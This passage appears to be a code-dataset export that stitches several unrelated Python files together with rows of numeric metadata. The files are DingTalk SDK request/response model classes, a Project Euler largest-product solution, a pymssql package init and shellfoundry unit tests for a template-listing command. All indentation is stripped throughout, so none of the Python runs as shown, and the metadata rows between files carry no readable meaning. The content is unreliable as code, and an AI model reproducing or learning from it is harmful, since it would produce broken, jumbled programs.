items: List[SearchOrgInnerGroupInfoResponseBodyItems] = None,
):
self.total_count = total_count
self.item_count = item_count
self.items = items
def validate(self):
if self.items:
for k in self.items:
if k:
k.validate()
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.total_count is not None:
result['totalCount'] = self.total_count
if self.item_count is not None:
result['itemCount'] = self.item_count
result['items'] = []
if self.items is not None:
for k in self.items:
result['items'].append(k.to_map() if k else None)
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('totalCount') is not None:
self.total_count = m.get('totalCount')
if m.get('itemCount') is not None:
self.item_count = m.get('itemCount')
self.items = []
if m.get('items') is not None:
for k in m.get('items'):
temp_model = SearchOrgInnerGroupInfoResponseBodyItems()
self.items.append(temp_model.from_map(k))
return self
class SearchOrgInnerGroupInfoResponse(TeaModel):
def __init__(
self,
headers: Dict[str, str] = None,
body: SearchOrgInnerGroupInfoResponseBody = None,
):
self.headers = headers
self.body = body
def validate(self):
self.validate_required(self.headers, 'headers')
self.validate_required(self.body, 'body')
if self.body:
self.body.validate()
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.body is not None:
result['body'] = self.body.to_map()
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('body') is not None:
temp_model = SearchOrgInnerGroupInfoResponseBody()
self.body = temp_model.from_map(m['body'])
return self
class SendInvitationHeaders(TeaModel):
def __init__(
self,
common_headers: Dict[str, str] = None,
x_acs_dingtalk_access_token: str = None,
):
self.common_headers = common_headers
self.x_acs_dingtalk_access_token = x_acs_dingtalk_access_token
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.common_headers is not None:
result['commonHeaders'] = self.common_headers
if self.x_acs_dingtalk_access_token is not None:
result['x-acs-dingtalk-access-token'] = self.x_acs_dingtalk_access_token
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('commonHeaders') is not None:
self.common_headers = m.get('commonHeaders')
if m.get('x-acs-dingtalk-access-token') is not None:
self.x_acs_dingtalk_access_token = m.get('x-acs-dingtalk-access-token')
return self
class SendInvitationRequest(TeaModel):
def __init__(
self,
dept_id: str = None,
partner_num: str = None,
partner_label_id: int = None,
phone: str = None,
org_alias: str = None,
):
# 部门id
self.dept_id = dept_id
# 伙伴编码
self.partner_num = partner_num
# 伙伴标签id
self.partner_label_id = partner_label_id
# 手机号
self.phone = phone
# 组织别名
self.org_alias = org_alias
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.dept_id is not None:
result['deptId'] = self.dept_id
if self.partner_num is not None:
result['partnerNum'] = self.partner_num
if self.partner_label_id is not None:
result['partnerLabelId'] = self.partner_label_id
if self.phone is not None:
result['phone'] = self.phone
if self.org_alias is not None:
result['orgAlias'] = self.org_alias
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('deptId') is not None:
self.dept_id = m.get('deptId')
if m.get('partnerNum') is not None:
self.partner_num = m.get('partnerNum')
if m.get('partnerLabelId') is not None:
self.partner_label_id = m.get('partnerLabelId')
if m.get('phone') is not None:
self.phone = m.get('phone')
if m.get('orgAlias') is not None:
self.org_alias = m.get('orgAlias')
return self
class SendInvitationResponse(TeaModel):
def __init__(
self,
headers: Dict[str, str] = None,
):
self.headers = headers
def validate(self):
self.validate_required(self.headers, 'headers')
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.headers is not None:
result['headers'] = self.headers
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
return self
class GetGroupActiveInfoHeaders(TeaModel):
def __init__(
self,
common_headers: Dict[str, str] = None,
x_acs_dingtalk_access_token: str = None,
):
self.common_headers = common_headers
self.x_acs_dingtalk_access_token = x_acs_dingtalk_access_token
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.common_headers is not None:
result['commonHeaders'] = self.common_headers
if self.x_acs_dingtalk_access_token is not None:
result['x-acs-dingtalk-access-token'] = self.x_acs_dingtalk_access_token
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('commonHeaders') is not None:
self.common_headers = m.get('commonHeaders')
if m.get('x-acs-dingtalk-access-token') is not None:
self.x_acs_dingtalk_access_token = m.get('x-acs-dingtalk-access-token')
return self
class GetGroupActiveInfoRequest(TeaModel):
def __init__(
self,
stat_date: str = None,
ding_group_id: str = None,
page_number: int = None,
page_size: int = None,
):
# 统计日期
self.stat_date = stat_date
# 钉钉群组id
self.ding_group_id = ding_group_id
# 分页起始页
self.page_number = page_number
# 分页大小
self.page_size = page_size
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.stat_date is not None:
result['statDate'] = self.stat_date
if self.ding_group_id is not None:
result['dingGroupId'] = self.ding_group_id
if self.page_number is not None:
result['pageNumber'] = self.page_number
if self.page_size is not None:
result['pageSize'] = self.page_size
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('statDate') is not None:
self.stat_date = m.get('statDate')
if m.get('dingGroupId') is not None:
self.ding_group_id = m.get('dingGroupId')
if m.get('pageNumber') is not None:
self.page_number = m.get('pageNumber')
if m.get('pageSize') is not None:
self.page_size = m.get('pageSize')
return self
class GetGroupActiveInfoResponseBodyData(TeaModel):
def __init__(
self,
stat_date: str = None,
ding_group_id: str = None,
group_create_time: str = None,
group_create_user_id: str = None,
group_create_user_name: str = None,
group_name: str = None,
group_type: int = None,
group_user_cnt_1d: int = None,
send_message_user_cnt_1d: int = None,
send_message_cnt_1d: int = None,
open_conv_uv_1d: int = None,
):
# 统计时间
self.stat_date = stat_date
# 群组id
self.ding_group_id = ding_group_id
# 群组创建时间
self.group_create_time = group_create_time
# 群组创建用户id
self.group_create_user_id = group_create_user_id
# 群组创建用户姓名
self.group_create_user_name = group_create_user_name
# 群名称
self.group_name = group_name
# 群类型:1-全员群,2-部门群,3-(其他)内部群,4-场景群
self.group_type = group_type
# 最近1天群人数
self.group_user_cnt_1d = group_user_cnt_1d
# 最近1天发消息人数
self.send_message_user_cnt_1d = send_message_user_cnt_1d
# 最近1天发消息次数
self.send_message_cnt_1d = send_message_cnt_1d
# 最近1天打开群人数
self.open_conv_uv_1d = open_conv_uv_1d
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.stat_date is not None:
result['statDate'] = self.stat_date
if self.ding_group_id is not None:
result['dingGroupId'] = self.ding_group_id
if self.group_create_time is not None:
result['groupCreateTime'] = self.group_create_time
if self.group_create_user_id is not None:
result['groupCreateUserId'] = self.group_create_user_id
if self.group_create_user_name is not None:
result['groupCreateUserName'] = self.group_create_user_name
if self.group_name is not None:
result['groupName'] = self.group_name
if self.group_type is not None:
result['groupType'] = self.group_type
if self.group_user_cnt_1d is not None:
result['groupUserCnt1d'] = self.group_user_cnt_1d
if self.send_message_user_cnt_1d is not None:
result['sendMessageUserCnt1d'] = self.send_message_user_cnt_1d
if self.send_message_cnt_1d is not None:
result['sendMessageCnt1d'] = self.send_message_cnt_1d
if self.open_conv_uv_1d is not None:
result['openConvUv1d'] = self.open_conv_uv_1d
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('statDate') is not None:
self.stat_date = m.get('statDate')
if m.get('dingGroupId') is not None:
self.ding_group_id = m.get('dingGroupId')
if m.get('groupCreateTime') is not None:
self.group_create_time = m.get('groupCreateTime')
if m.get('groupCreateUserId') is not None:
self.group_create_user_id = m.get('groupCreateUserId')
if m.get('groupCreateUserName') is not None:
self.group_create_user_name = m.get('groupCreateUserName')
if m.get('groupName') is not None:
self.group_name = m.get('groupName')
if m.get('groupType') is not None:
self.group_type = m.get('groupType')
if m.get('groupUserCnt1d') is not None:
self.group_user_cnt_1d = m.get('groupUserCnt1d')
if m.get('sendMessageUserCnt1d') is not None:
self.send_message_user_cnt_1d = m.get('sendMessageUserCnt1d')
if m.get('sendMessageCnt1d') is not None:
self.send_message_cnt_1d = m.get('sendMessageCnt1d')
if m.get('openConvUv1d') is not None:
self.open_conv_uv_1d = m.get('openConvUv1d')
return self
class GetGroupActiveInfoResponseBody(TeaModel):
def __init__(
self,
data: List[GetGroupActiveInfoResponseBodyData] = None,
total_count: int = None,
):
self.data = data
self.total_count = total_count
def validate(self):
if self.data:
for k in self.data:
if k:
k.validate()
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
result['data'] = []
if self.data is not None:
for k in self.data:
result['data'].append(k.to_map() if k else None)
if self.total_count is not None:
result['totalCount'] = self.total_count
return result
def from_map(self, m: dict = None):
m = m or dict()
self.data = []
if m.get('data') is not None:
for k in m.get('data'):
temp_model = GetGroupActiveInfoResponseBodyData()
self.data.append(temp_model.from_map(k))
if m.get('totalCount') is not None:
self.total_count = m.get('totalCount')
return self
class GetGroupActiveInfoResponse(TeaModel):
def __init__(
self,
headers: Dict[str, str] = None,
body: GetGroupActiveInfoResponseBody = None,
):
self.headers = headers
self.body = body
def validate(self):
self.validate_required(self.headers, 'headers')
self.validate_required(self.body, 'body')
if self.body:
self.body.validate()
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.body is not None:
result['body'] = self.body.to_map()
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('body') is not None:
temp_model = GetGroupActiveInfoResponseBody()
self.body = temp_model.from_map(m['body'])
return self
class GetCommentListHeaders(TeaModel):
def __init__(
self,
common_headers: Dict[str, str] = None,
x_acs_dingtalk_access_token: str = None,
):
self.common_headers = common_headers
self.x_acs_dingtalk_access_token = x_acs_dingtalk_access_token
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.common_headers is not None:
result['commonHeaders'] = self.common_headers
if self.x_acs_dingtalk_access_token is not None:
result['x-acs-dingtalk-access-token'] = self.x_acs_dingtalk_access_token
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('commonHeaders') is not None:
self.common_headers = m.get('commonHeaders')
if m.get('x-acs-dingtalk-access-token') is not None:
self.x_acs_dingtalk_access_token = m.get('x-acs-dingtalk-access-token')
return self
class GetCommentListRequest(TeaModel):
def __init__(
self,
page_number: int = None,
page_size: int = None,
):
# 分页起始页
self.page_number = page_number
# 分页大小
self.page_size = page_size
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.page_number is not None:
result['pageNumber'] = self.page_number
if self.page_size is not None:
result['pageSize'] = self.page_size
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('pageNumber') is not None:
self.page_number = m.get('pageNumber')
if m.get('pageSize') is not None:
self.page_size = m.get('pageSize')
return self
class GetCommentListResponseBodyData(TeaModel):
def __init__(
self,
comment_user_name: str = None,
content: str = None,
comment_time: float = None,
comment_id: str = None,
):
# 评论者姓名
self.comment_user_name = comment_user_name
# 评论内容
self.content = content
# 评论时间
self.comment_time = comment_time
# 评论ID
self.comment_id = comment_id
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.comment_user_name is not None:
result['commentUserName'] = self.comment_user_name
if self.content is not None:
result['content'] = self.content
if self.comment_time is not None:
result['commentTime'] = self.comment_time
if self.comment_id is not None:
result['commentId'] = self.comment_id
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('commentUserName') is not None:
self.comment_user_name = m.get('commentUserName')
if m.get('content') is not None:
self.content = m.get('content')
if m.get('commentTime') is not None:
self.comment_time = m.get('commentTime')
if m.get('commentId') is not None:
self.comment_id = m.get('commentId')
return self
class GetCommentListResponseBody(TeaModel):
def __init__(
self,
data: List[GetCommentListResponseBodyData] = None,
total_count: int = None,
):
self.data = data
self.total_count = total_count
def validate(self):
if self.data:
for k in self.data:
if k:
k.validate()
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
result['data'] = []
if self.data is not None:
for k in self.data:
result['data'].append(k.to_map() if k else None)
if self.total_count is not None:
result['totalCount'] = self.total_count
return result
def from_map(self, m: dict = None):
m = m or dict()
self.data = []
if m.get('data') is not None:
for k in m.get('data'):
temp_model = GetCommentListResponseBodyData()
self.data.append(temp_model.from_map(k))
if m.get('totalCount') is not None:
self.total_count = m.get('totalCount')
return self
class GetCommentListResponse(TeaModel):
def __init__(
self,
headers: Dict[str, str] = None,
body: GetCommentListResponseBody = None,
):
self.headers = headers
self.body = body
def validate(self):
self.validate_required(self.headers, 'headers')
self.validate_required(self.body, 'body')
if self.body:
self.body.validate()
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.body is not None:
result['body'] = self.body.to_map()
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('body') is not None:
temp_model = GetCommentListResponseBody()
self.body = temp_model.from_map(m['body'])
return self
| 31.182187
| 103
| 0.58471
| 21,292
| 169,101
| 4.426498
| 0.027428
| 0.047375
| 0.085274
| 0.05825
| 0.793356
| 0.74717
| 0.72283
| 0.709886
| 0.703859
| 0.69884
| 0
| 0.001694
| 0.319259
| 169,101
| 5,422
| 104
| 31.187938
| 0.817051
| 0.009976
| 0
| 0.815098
| 1
| 0
| 0.078515
| 0.018666
| 0
| 0
| 0
| 0
| 0
| 1
| 0.114132
| false
| 0.017973
| 0.000449
| 0
| 0.228713
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d343e11db61eb572d2999b2132ba33b5bd85c779
| 2,893
|
py
|
Python
|
solved_problems/8_Largest product in a series.py
|
anajulijapreseren/Project_Euler
|
e599084b778cbcfc09b7c79b1dd406d80cce6bbf
|
[
"MIT"
] | null | null | null |
solved_problems/8_Largest product in a series.py
|
anajulijapreseren/Project_Euler
|
e599084b778cbcfc09b7c79b1dd406d80cce6bbf
|
[
"MIT"
] | null | null | null |
solved_problems/8_Largest product in a series.py
|
anajulijapreseren/Project_Euler
|
e599084b778cbcfc09b7c79b1dd406d80cce6bbf
|
[
"MIT"
] | null | null | null |
# The four adjacent digits in the 1000-digit number that have the greatest product are 9 × 9 × 8 × 9 = 5832.
##
#73167176531330624919225119674426574742355349194934
#96983520312774506326239578318016984801869478851843
#85861560789112949495459501737958331952853208805511
#12540698747158523863050715693290963295227443043557
#66896648950445244523161731856403098711121722383113
#62229893423380308135336276614282806444486645238749
#30358907296290491560440772390713810515859307960866
#70172427121883998797908792274921901699720888093776
#65727333001053367881220235421809751254540594752243
#52584907711670556013604839586446706324415722155397
#53697817977846174064955149290862569321978468622482
#83972241375657056057490261407972968652414535100474
#82166370484403199890008895243450658541227588666881
#16427171479924442928230863465674813919123162824586
#17866458359124566529476545682848912883142607690042
#24219022671055626321111109370544217506941658960408
#07198403850962455444362981230987879927244284909188
#84580156166097919133875499200524063689912560717606
#05886116467109405077541002256983155200055935729725
#71636269561882670428252483600823257530420752963450
##
#Find the thirteen adjacent digits in the 1000-digit number that have the greatest product.
#What is the value of this product?
def naredi_seznam(n):
"""dobimo seznam, ki vsebuje posamezne cifre števila"""
sez = []
while n > 9:
ostanek = n % 10
n = n // 10
sez.append(ostanek)
sez.append(n)
return sez[::-1]
def the_greatest_product_13(n):
sez = naredi_seznam(n)
max_product = 0
while len(sez) >= 13:
new_product = 1
for i in sez[:13]:
new_product *= i
max_product = max(max_product, new_product)
sez = sez[1:]
return max_product
num = int("""
73167176531330624919225119674426574742355349194934
96983520312774506326239578318016984801869478851843
85861560789112949495459501737958331952853208805511
12540698747158523863050715693290963295227443043557
66896648950445244523161731856403098711121722383113
62229893423380308135336276614282806444486645238749
30358907296290491560440772390713810515859307960866
70172427121883998797908792274921901699720888093776
65727333001053367881220235421809751254540594752243
52584907711670556013604839586446706324415722155397
53697817977846174064955149290862569321978468622482
83972241375657056057490261407972968652414535100474
82166370484403199890008895243450658541227588666881
16427171479924442928230863465674813919123162824586
17866458359124566529476545682848912883142607690042
24219022671055626321111109370544217506941658960408
07198403850962455444362981230987879927244284909188
84580156166097919133875499200524063689912560717606
05886116467109405077541002256983155200055935729725
71636269561882670428252483600823257530420752963450""".replace("\n", ""))
print(the_greatest_product_13(num))
| 41.328571
| 108
| 0.86692
| 166
| 2,893
| 15.036145
| 0.433735
| 0.017628
| 0.028846
| 0.015224
| 0.849359
| 0.849359
| 0.849359
| 0.849359
| 0.849359
| 0.849359
| 0
| 0.774771
| 0.092983
| 2,893
| 70
| 109
| 41.328571
| 0.175305
| 0.443139
| 0
| 0
| 0
| 0
| 0.646835
| 0.632911
| 0
| 0
| 0
| 0
| 0
| 1
| 0.05
| false
| 0
| 0
| 0
| 0.1
| 0.025
| 0
| 0
| 1
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 11
|
d35825d58ffb0c07f5d2cd01ff45e82f6bd92bf0
| 101
|
py
|
Python
|
env/Lib/site-packages/pymssql/__init__.py
|
acadianshadow237/BA_MDI1
|
73e0e87c15ff083ce860f7a09fa2de3a3c71c215
|
[
"MIT"
] | 5
|
2021-04-05T23:47:06.000Z
|
2021-09-18T14:50:37.000Z
|
env/Lib/site-packages/pymssql/__init__.py
|
acadianshadow237/BA_MDI1
|
73e0e87c15ff083ce860f7a09fa2de3a3c71c215
|
[
"MIT"
] | null | null | null |
env/Lib/site-packages/pymssql/__init__.py
|
acadianshadow237/BA_MDI1
|
73e0e87c15ff083ce860f7a09fa2de3a3c71c215
|
[
"MIT"
] | 1
|
2021-09-12T13:26:15.000Z
|
2021-09-12T13:26:15.000Z
|
# -*- coding: utf-8 -*-
from ._pymssql import *
from ._pymssql import __version__, __full_version__
| 20.2
| 51
| 0.722772
| 12
| 101
| 5.166667
| 0.666667
| 0.354839
| 0.548387
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.011628
| 0.148515
| 101
| 4
| 52
| 25.25
| 0.709302
| 0.207921
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
6cfd1c381d03faefe1c211c47421747c073f1825
| 27,581
|
py
|
Python
|
tests/test_commands/test_list_command.py
|
p-sherratt/shellfoundry
|
d1f35a31123b9e701c801345fb633b6fda5420b7
|
[
"Apache-2.0"
] | null | null | null |
tests/test_commands/test_list_command.py
|
p-sherratt/shellfoundry
|
d1f35a31123b9e701c801345fb633b6fda5420b7
|
[
"Apache-2.0"
] | 1
|
2021-03-25T23:21:02.000Z
|
2021-03-25T23:21:02.000Z
|
tests/test_commands/test_list_command.py
|
p-sherratt/shellfoundry
|
d1f35a31123b9e701c801345fb633b6fda5420b7
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/python
# -*- coding: utf-8 -*-
import unittest
import httpretty
from pyfakefs import fake_filesystem_unittest
from click import UsageError, ClickException
from mock import Mock, MagicMock, patch
from requests.exceptions import SSLError
from cloudshell.rest.api import FeatureUnavailable
from shellfoundry.commands.list_command import ListCommandExecutor
from shellfoundry.models.shell_template import ShellTemplate
from shellfoundry.utilities.template_retriever import FilteredTemplateRetriever, TemplateRetriever, TEMPLATES_YML
class TestListCommand(unittest.TestCase):
@patch('click.echo')
@patch('shellfoundry.commands.list_command.AsciiTable.column_max_width')
def test_single_template_is_displayed(self, max_width_mock, echo_mock):
# Arrange
max_width_mock.return_value = 62 # mocking the max width to eliminate the distinction
# between the running console size
template_retriever = Mock()
template_retriever.get_templates = Mock(
return_value={'gen1/base': [ShellTemplate('gen1/base', 'description', '', '7.0')]})
standards = Mock()
standards.fetch.return_value = {}
list_command_executor = ListCommandExecutor(template_retriever=template_retriever, standards=standards)
# Act
list_command_executor.list()
# Assert
echo_mock.assert_any_call(u' Template Name CloudShell Ver. Description \n'
u'---------------------------------------------\n'
u' gen1/base 7.0 and up description ')
@patch('shellfoundry.commands.list_command.Configuration')
def test_shows_informative_message_when_offline(self, conf_class):
# Arrange
configuration = MagicMock(read=MagicMock(return_value=MagicMock(online_mode="True")))
conf_class.return_value = configuration
template_retriever = Mock()
template_retriever.get_templates.side_effect = SSLError()
list_command_executor = ListCommandExecutor(template_retriever=template_retriever,
standards=Mock())
# Assert
self.assertRaisesRegexp(UsageError, "offline", list_command_executor.list)
@patch('click.echo')
@patch('shellfoundry.commands.list_command.AsciiTable.column_max_width')
def test_two_templates_are_displayed(self, max_width_mock, echo_mock):
# Arrange
max_width_mock.return_value = 62 # mocking the max width to eliminate the distinction
# between the running console size
template_retriever = Mock()
template_retriever.get_templates = Mock(return_value={
'gen1/base': [ShellTemplate('gen1/base', 'base description', '', '7.0', 'base')],
'gen1/switch': [ShellTemplate('gen1/switch', 'switch description', '', '7.0')]})
standards = Mock()
standards.fetch.return_value = {}
list_command_executor = ListCommandExecutor(template_retriever=template_retriever, standards=standards)
# Act
list_command_executor.list()
# Assert
echo_mock.assert_any_call(
u' Template Name CloudShell Ver. Description \n'
u'----------------------------------------------------\n'
u' gen1/base 7.0 and up base description \n'
u' gen1/switch 7.0 and up switch description ')
@patch('click.echo')
@patch('shellfoundry.commands.list_command.AsciiTable.column_max_width')
def test_two_long_named_templates_are_displayed_on_normal_window(self, max_width_mock, echo_mock):
# Arrange
max_width_mock.return_value = 40 # mocking the max width to eliminate the distinction
# between the running console size
template_retriever = Mock()
template_retriever.get_templates = Mock(return_value={
'gen2/networking/switch': [ShellTemplate('gen2/networking/switch',
'TOSCA based template for standard Switch devices/virtual appliances',
'', '8.0')],
'gen2/networking/WirelessController': [ShellTemplate('gen2/networking/WirelessController',
'TOSCA based template for standard WirelessController devices/virtual appliances',
'', '8.0')]})
standards = Mock()
standards.fetch.return_value = {}
list_command_executor = ListCommandExecutor(template_retriever=template_retriever, standards=standards)
# Act
list_command_executor.list()
# Assert
echo_mock.assert_any_call(
u' Template Name CloudShell Ver. Description \n'
u'-----------------------------------------------------------------------------------------------\n'
u' gen2/networking/WirelessController 8.0 and up TOSCA based template for standard \n'
u' WirelessController devices/virtual \n'
u' appliances \n'
u' gen2/networking/switch 8.0 and up TOSCA based template for standard Switch \n'
u' devices/virtual appliances '
)
@patch('click.echo')
@patch('shellfoundry.commands.list_command.AsciiTable.column_max_width')
def test_console_size_small_description_wrapping_logic_ignored(self, max_width_mock, echo_mock):
# Arrange
max_width_mock.return_value = 0
template_retriever = Mock()
template_retriever.get_templates = Mock(return_value={
'gen2/networking/switch': [ShellTemplate('gen2/networking/switch',
'TOSCA based template for standard Switch devices/virtual appliances',
'', '8.0')],
'gen2/networking/WirelessController': [ShellTemplate('gen2/networking/WirelessController',
'TOSCA based template for standard WirelessController devices/virtual appliances',
'', '8.0')]})
standards = Mock()
standards.fetch.return_value = {"networking": ['2.0.0'],
"resource": ['5.0.0', '5.0.1'],
"vido": ['3.0.1', '3.0.2', '3.0.3']}
list_command_executor = ListCommandExecutor(template_retriever=template_retriever, standards=standards)
# Act
list_command_executor.list()
# Assert
echo_mock.assert_called_once_with(
u' Template Name CloudShell Ver. Description \n'
u'--------------------------------------------------------------------------------------------------------------------------------------\n'
u' gen2/networking/WirelessController 8.0 and up TOSCA based template for standard WirelessController devices/virtual appliances \n'
u' gen2/networking/switch 8.0 and up TOSCA based template for standard Switch devices/virtual appliances '
)
@patch('click.echo')
@patch('shellfoundry.commands.list_command.AsciiTable.column_max_width')
def test_filter_by_tosca_shows_all_tosca_templates(self, max_width_mock, echo_mock):
# Arrange
max_width_mock.return_value = 40
template_retriever = Mock()
template_retriever.get_templates = Mock(return_value={
'gen2/networking/switch': [ShellTemplate('gen2/networking/switch',
'TOSCA based template for standard Switch devices/virtual appliances',
'', '8.0')],
'gen2/networking/WirelessController': [ShellTemplate('gen2/networking/WirelessController',
'TOSCA based template for standard WirelessController devices/virtual appliances',
'', '8.0')],
'gen1/base': [ShellTemplate('gen1/base', 'base description', '', '7.0')],
'gen1/switch': [ShellTemplate('gen1/switch', 'switch description', '', '7.0')]})
flag_value = 'gen2'
standards = Mock()
standards.fetch.return_value = {}
list_command_executor = ListCommandExecutor(
template_retriever=FilteredTemplateRetriever(flag_value, template_retriever), standards=standards)
# Act
list_command_executor.list()
# Assert
echo_mock.assert_any_call(
u' Template Name CloudShell Ver. Description \n'
u'-----------------------------------------------------------------------------------------------\n'
u' gen2/networking/WirelessController 8.0 and up TOSCA based template for standard \n'
u' WirelessController devices/virtual \n'
u' appliances \n'
u' gen2/networking/switch 8.0 and up TOSCA based template for standard Switch \n'
u' devices/virtual appliances ')
@patch('click.echo')
@patch('shellfoundry.commands.list_command.AsciiTable.column_max_width')
def test_filter_by_legacy_shows_all_legacy_templates(self, max_width_mock, echo_mock):
# Arrange
max_width_mock.return_value = 62
template_retriever = Mock()
template_retriever.get_templates = Mock(return_value={
'gen2/networking/switch': [ShellTemplate('gen2/networking/switch',
'TOSCA based template for standard Switch devices/virtual appliances',
'', '8.0')],
'gen2/networking/WirelessController': [ShellTemplate('gen2/networking/WirelessController',
'TOSCA based template for standard WirelessController devices/virtual appliances',
'', '8.0')],
'gen1/base': [ShellTemplate('gen1/base', 'base description', '', '7.0')],
'gen1/switch': [ShellTemplate('gen1/switch', 'switch description', '', '7.0')]})
flag_value = 'gen1'
standards = Mock()
standards.fetch.return_value = {}
list_command_executor = ListCommandExecutor(
template_retriever=FilteredTemplateRetriever(flag_value, template_retriever), standards=standards)
# Act
list_command_executor.list()
# Assert
echo_mock.assert_any_call(
u' Template Name CloudShell Ver. Description \n'
u'----------------------------------------------------\n'
u' gen1/base 7.0 and up base description \n'
u' gen1/switch 7.0 and up switch description ')
@patch('click.echo')
@patch('shellfoundry.commands.list_command.AsciiTable.column_max_width')
def test_filter_by_all_shows_all_templates(self, max_width_mock, echo_mock):
# Arrange
max_width_mock.return_value = 40
template_retriever = Mock()
template_retriever.get_templates = Mock(return_value={
'gen1/base': [ShellTemplate('gen1/base', 'base description', '', '7.0')],
'gen1/switch': [ShellTemplate('gen1/switch', 'switch description', '', '7.0')],
'gen2/networking/switch': [ShellTemplate('gen2/networking/switch',
'TOSCA based template for standard Switch devices/virtual appliances',
'', '8.0')],
'gen2/networking/WirelessController': [ShellTemplate('gen2/networking/WirelessController',
'TOSCA based template for standard WirelessController devices/virtual appliances',
'', '8.0')]})
flag_value = 'all'
standards = Mock()
standards.fetch.return_value = {}
list_command_executor = ListCommandExecutor(
template_retriever=FilteredTemplateRetriever(flag_value, template_retriever), standards=standards)
# Act
list_command_executor.list()
# Assert
echo_mock.assert_any_call(
u' Template Name CloudShell Ver. Description \n'
u'-----------------------------------------------------------------------------------------------\n'
u' gen2/networking/WirelessController 8.0 and up TOSCA based template for standard \n'
u' WirelessController devices/virtual \n'
u' appliances \n'
u' gen1/base 7.0 and up base description \n'
u' gen1/switch 7.0 and up switch description \n'
u' gen2/networking/switch 8.0 and up TOSCA based template for standard Switch \n'
u' devices/virtual appliances ')
# @patch('click.echo')
@patch('shellfoundry.commands.list_command.AsciiTable.column_max_width')
def test_list_shows_nothing_because_filter_is_set_for_templates_that_do_not_exist(self, max_width_mock):
# Arrange
max_width_mock.return_value = 40
template_retriever = Mock()
template_retriever.get_templates = Mock(return_value={
'gen2/networking/switch': [ShellTemplate('gen2/networking/switch',
'TOSCA based template for standard Switch devices/virtual appliances',
'', '8.0')],
'gen2/networking/WirelessController': [ShellTemplate('gen2/networking/WirelessController',
'TOSCA based template for standard WirelessController devices/virtual appliances',
'', '8.0')]})
flag_value = 'gen1'
standards = Mock()
standards.fetch.return_value = {}
list_command_executor = ListCommandExecutor(
template_retriever=FilteredTemplateRetriever(flag_value, template_retriever), standards=standards)
# Act
with self.assertRaisesRegexp(ClickException, "No templates matched the view criteria\(gen1/gen2\) or "
"available templates and standards are not compatible"):
list_command_executor.list()
# Assert
# echo_mock.assert_called_once_with("No templates matched the criteria")
@patch('click.echo')
@patch('shellfoundry.commands.list_command.AsciiTable.column_max_width')
def test_devguide_text_note_appears_when_no_filter_was_selected(self, max_width_mock, echo_mock):
# Arrange
max_width_mock.return_value = 40
template_retriever = Mock()
template_retriever.get_templates = Mock(return_value={
'gen2/networking/switch': [ShellTemplate('gen2/networking/switch',
'TOSCA based template for standard Switch devices/virtual appliances',
'', '8.0')],
'gen2/networking/WirelessController': [ShellTemplate('gen2/networking/WirelessController',
'TOSCA based template for standard WirelessController devices/virtual appliances',
'', '8.0')]})
flag_value = None
standards = Mock()
standards.fetch.return_value = {}
list_command_executor = ListCommandExecutor(
template_retriever=FilteredTemplateRetriever(flag_value, template_retriever), standards=standards)
# Act
list_command_executor.list()
# Assert
echo_mock.assert_any_call('''
As of CloudShell 8.0, CloudShell uses 2nd generation shells, to view the list of 1st generation shells use: shellfoundry list --gen1.
For more information, please visit our devguide: https://qualisystems.github.io/devguide/''')
